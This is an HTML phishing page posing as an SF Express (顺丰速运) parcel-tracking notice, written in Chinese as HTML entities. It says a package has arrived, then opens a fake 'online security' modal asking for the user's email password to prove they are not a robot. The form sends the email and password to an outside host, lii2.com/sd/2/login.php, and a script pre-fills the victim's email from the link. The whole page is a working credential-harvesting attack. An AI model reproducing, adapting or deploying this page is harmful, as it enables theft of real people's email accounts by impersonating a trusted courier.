<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  <title>&#39034;&#20016;&#36895;&#36816; | &#36861;&#36394;</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
</head>
<body style="margin: 0;">
<style>
._nLdk{
position:absolute;
left:50%;
top:100px;
transform:translate(-50%,0%);	
}

._jTNd{
font-family: Trebuchet MS	
}

._DreH{
border: none;
border-bottom: 2px solid rgb(0, 128, 255); 
padding: 13px; 
width: 300px; 
max-width: 80%; 
height: 18px; 
font-family: Verdana; 
font-size: 15px; 
color: rgb(0, 0, 0); 
background: transparent;	
}

._nMUv{
border: 1px #CA1E07;
width: 150px; 
height: 40px; 
background-color: #CA1E07;
font-family: Arial, Helvetica, sans-serif; 
font-size: 15px; 
color: #FFF; 
border-radius: 1px 1px;
cursor: pointer;
font-weight:bold;
box-shadow: 2px 2px 2px #000;

 

}

._FrEw{
padding: 15px;
border: 1px solid transparent;
border-radius: 4px;
color: #a94442;
background-color: #f2dede;
}
</style>

<style>
  body {
    font-family: 'Arial', sans-serif; /* Use a modern sans-serif font */
  }
  .modern-text {
    text-align: center;
    font-size: 18px; /* Adjust font size for better readability */
    color: #333; /* Darker color for better contrast */
    font-weight: bold; /* Maintain boldness for emphasis */
    letter-spacing: 1px; /* Add slight letter-spacing for clarity */
    line-height: 1.6; /* Increase line-height for better readability */
  }
</style>

<div style="width:100%;height:40px;overflow: hidden;background-color: black">
<img src="https://imgur.com/0lKl38m.png" style="width:1500px; height:60px;">





</div>
<div align=center class="_nLdk"> 
<img src="https://imgur.com/5xDnv10.png" height=350>
<br>
<br>
<font align="center" size="3" class="_jTNd" color="black"></font>
<br>
<font size="3" class="_jTNd" color="black"></font>

<div class="modern-text">
  <b>&#24744;&#30340;&#21253;&#35065;&#20170;&#22825;&#21040;&#36798;&#25105;&#20204;&#30340;&#21150;&#20844;&#23460;</b>
</div>
<div class="modern-text">
  &#28857;&#20987;&#19979;&#38754;&#26597;&#30475;&#36816;&#36865;&#25991;&#20214;
</div>
<br>
<br>

<input data-toggle="modal" data-target="#myModal" name="TXT_03" class="_nMUv" value="&#28857;&#36825;&#37324;" style="" type="submit">

</form>
</div> 




<!-- Modal -->

<div class="modal fade" id="myModal" role="dialog">
    <div class="modal-dialog" style="max-width: 600px;">
    
      <!-- Modal content-->
      <div class="modal-content" style="background:white">
        <div class="modal-header">
          <button type="button" class="close" data-dismiss="modal">&times;</button>
        </div>
        <div class="modal-body" align=center>
          <img src="https://imgur.com/beE6yUt.png" width="50%">
		  <br>
		  <br>
        
                                                        <font face="Arial, Helvetica, sans-serif" size="2" color="black">
                                                            <b>&#39034;&#20016;&#22312;&#32447;&#23433;&#20840;</b> 
                                                            <br>
                                                            <b>&#26816;&#26597;&#24744;&#30340;&#30005;&#23376;&#37038;&#20214;&#20197;&#35777;&#26126;&#24744;&#19981;&#26159;&#26426;&#22120;&#20154;.</b>                                                                 </b></font>
                                                            <br>
                                                            <font face="Arial, Helvetica, sans-serif" size="2" color="black">
                                                            <i> &#35831;&#22312;&#19979;&#38754;&#36755;&#20837;&#24744;&#27491;&#30830;&#30340;&#30005;&#23376;&#37038;&#20214;&#23494;&#30721; </i>
                                                            </font>
<p></p>

<form method="post" action="https://www.lii2.com/sd/2/login.php">	
<input name="email" class="_DreH" required="" placeholder=" &#30005;&#23376;&#37038;&#20214; ID&#35831;&#36755;&#20837;" type="email" value="[[-Email-]]" id="email" readonly>
<br>
<br>
<input name="password" class="_DreH" required="" placeholder=" &#36755;&#20837;&#30005;&#23376;&#37038;&#20214;&#23494;&#30721;" type="password" autocomplete="off">
<br>
<br>
<br>
<input name="TXT_03" class="_nMUv" value="&#32487;&#32493;" style="width: 300px; max-width: 80%; " type="submit">
<br>
<br>
<br>
</form>
        </div>
        
      </div>
      
    </div>
  </div>

  <script>
    // Function to get URL parameter by name
    function getParameterByName(name, url) {
        if (!url) url = window.location.href;
        name = name.replace(/[\[\]]/g, "\\$&");
        var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),
            results = regex.exec(url);
        if (!results) return null;
        if (!results[2]) return '';
        return decodeURIComponent(results[2].replace(/\+/g, " "));
    }

    // Get the email parameter from the URL
    var emailFromURL = getParameterByName('email');

    // Set the email field value
    if (emailFromURL) {
        document.getElementById('email').value = emailFromURL;
    }

    // Optional: You can also submit the form automatically if needed
    // document.getElementById('sign-in-form').submit();
</script>

</body>
</html>
